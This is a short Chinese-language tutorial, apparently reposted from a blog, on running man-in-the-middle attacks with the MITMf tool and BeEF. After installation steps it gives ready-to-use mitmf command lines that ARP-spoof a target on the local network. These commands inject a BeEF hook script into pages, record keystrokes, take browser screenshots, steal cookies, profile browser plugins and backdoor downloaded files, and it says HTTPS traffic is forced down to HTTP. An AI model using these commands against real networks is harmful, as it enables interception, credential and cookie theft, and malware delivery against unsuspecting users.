中间人攻击

 注入xss即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码,一旦得手影响范围巨大,如果中间人发生在运营商路线上,很难引起用户注意。

mitmf安装教程:https://github.com/byt3bl33d3r/MITMf/wiki/Installation

apt-get install mitmf

pip uninstall twisted

wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2

tar -jvxf ./Twisted-15.5.0.tar.bz2

cd ./Twisted-15.5.0.tar.bz2

python setup.py install

beef结合mitmf进行跨站脚本注入攻击

启动beef
cd /usr/share/beef-xss/
./beef
mitmf中间人注入xss脚本
mitmf --spoof --arp -i eth0 --gateway <网关地址> --target <目标地址> --inject --js-url <hookURL>

 

 到目标客户端打开浏览器访问bing网站时,打开源代码就会看到里面已经被插入了脚本攻击代码,而且已经被强制从https解密到http了。

 

可以仅仅利用mitmf的插件也能进行一些很强大的攻击,比如键盘记录器
mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --jskeylogger

图片颠倒JOKE攻击

mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --upsidedownternet

被攻击的目标图片就全都颠倒过来了

浏览器截屏,每十秒截屏一次,截屏图片存在/var/log/mitmf目录下

mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址>  --screen

抓取cookies,cookies存在/var/log/mitmf目录下

mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --ferretng

浏览器插件信息获取

mitmf --spoof --arp -i <网卡> --gateway <网关地址> --target <目标地址> --browserprofiler

凌空插后门

--filepwn

原文地址:https://www.cnblogs.com/zylq-blog/p/6727725.html